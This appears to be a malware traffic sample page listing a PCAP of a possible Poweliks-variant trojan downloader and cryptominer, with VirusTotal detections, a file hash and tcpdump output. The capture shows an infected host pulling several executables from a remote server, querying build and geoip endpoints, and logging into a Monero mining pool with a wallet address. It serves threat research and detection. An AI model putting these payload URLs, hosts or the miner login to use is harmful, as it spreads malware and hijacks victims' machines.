Possible Poweliks Variant Trojan Malware Adware Pay-per-Download Bitcoin Cryptocurrency PCAP file download traffic sample

Download Attachments

  • 1 pcap: lnk. Date added: July 3, 2017 9:57 pm. Added by: admin. File size: 2 MB. Downloads: 62


VirusTotal results (engine, detection name, signature update date):

ESET-NOD32 NSIS/TrojanDownloader.Agent.NVZ 20170703
Fortinet W32/Agent.NVS!tr.dldr 20170629
Invincea heuristic 20170607
Kaspersky Trojan.Win32.Poweliks.adbd 20170703
McAfee Artemis!DD96CB7EFE6D 20170703
McAfee-GW-Edition BehavesLike.Win32.Vopak.kc 20170703
Microsoft Trojan:Win32/Starter.P 20170703
Palo Alto Networks (Known Signatures) generic.ml 20170703
Qihoo-360 Win32/Trojan.1e3 20170703
Rising Adware.ConvertAd!1.A1B5 (cloud:zJ49DXPzuCC) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Generic-S 20170703
Tencent Nsis.Trojan-downloader.Agent.Wuqw 20170703
TrendMicro-HouseCall Suspicious_GEN.F47V0703 20170703
VBA32 suspected of Trojan.Downloader.gen.h 20170630
VIPRE Trojan.Win32.Generic!BT 20170703
ZoneAlarm by Check Point Trojan.Win32.Poweliks.adbd 20170703


SHA256: f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72
File name: lnk.php
Detection ratio: 25 / 61
Analysis date: 2017-07-03 21:51:38 UTC


https://virustotal.com/en/file/f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72/analysis/1499118698/


2017-07-03 15:34:00.193162 IP 192.168.1.102.60285 > 198.50.183.24.80: Flags [P.], seq 0:390, ack 1, win 256, length 390: HTTP: GET /lnk.php HTTP/1.1
GET /lnk.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syska.gdn
Connection: Keep-Alive

2017-07-03 15:34:36.065319 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:36.366793 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache


2017-07-03 15:34:44.119376 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 131:262, ack 486923, win 256, length 131
GET /20.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.011332 IP 192.168.1.102.60289 > 198.50.183.24.80: Flags [P.], seq 0:130, ack 1, win 256, length 130: HTTP: GET /nm/geoip.php HTTP/1.1
GET /nm/geoip.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cydro.gdn
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.067684 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 262:392, ack 1511166, win 255, length 130
GET /7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache


2017-07-03 15:35:07.289892 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 392:523, ack 2443112, win 256, length 131
GET /45.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache


2017-07-03 15:35:13.808692 IP 192.168.1.102.60839 > 75.75.75.75.53: 1813+ A? xmr.crypto-pool.fr. (36)
2017-07-03 15:35:14.095181 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [S], seq 3285038852, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:35:14.199441 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 203640344, win 256, length 0
2017-07-03 15:35:14.201398 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [P.], seq 0:197, ack 1, win 256, length 197
{"method": "login", "params": {"login": "49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY", "pass": "x", "agent": "cpuminer-multi/1.2-dev"}, "id": 1}

2017-07-03 15:35:14.438781 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 304, win 255, length 0
2017-07-03 15:35:15.212929 IP 192.168.1.102.60840 > 75.75.75.75.53: 41488+ A? nottotrack.com. (32)
2017-07-03 15:35:15.319740 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [S], seq 1077723448, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:35:15.420292 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [.], ack 550699079, win 256, length 0
2017-07-03 15:35:15.427728 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /proxy/get_build.php HTTP/1.0
GET /proxy/get_build.php HTTP/1.0
Host: nottotrack.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2017-07-03 15:37:05.377167 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4464826, win 5446, length 0
2017-07-03 15:37:05.378957 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4469206, win 5446, length 0
2017-07-03 15:37:05.380518 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4473586, win 5446, length 0
2017-07-03 15:37:05.381921 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4477966, win 5446, length 0
2017-07-03 15:37:05.382248 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4479426, win 5446, length 0
2017-07-03 15:37:05.385510 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4491106, win 5417, length 0
2017-07-03 15:37:05.388535 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4501326, win 5417, length 0
2017-07-03 15:37:05.397221 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4515926, win 5383, length 0
2017-07-03 15:37:05.397349 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4530526, win 5383, length 0
2017-07-03 15:37:05.397356 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4531986, win 5383, length 0
2017-07-03 15:37:05.401019 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4543666, win 5366, length 0
2017-07-03 15:37:05.407107 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4558266, win 5366, length 0
2017-07-03 15:37:05.407261 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4565566, win 5366, length 0
2017-07-03 15:37:05.412163 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4578706, win 5355, length 0
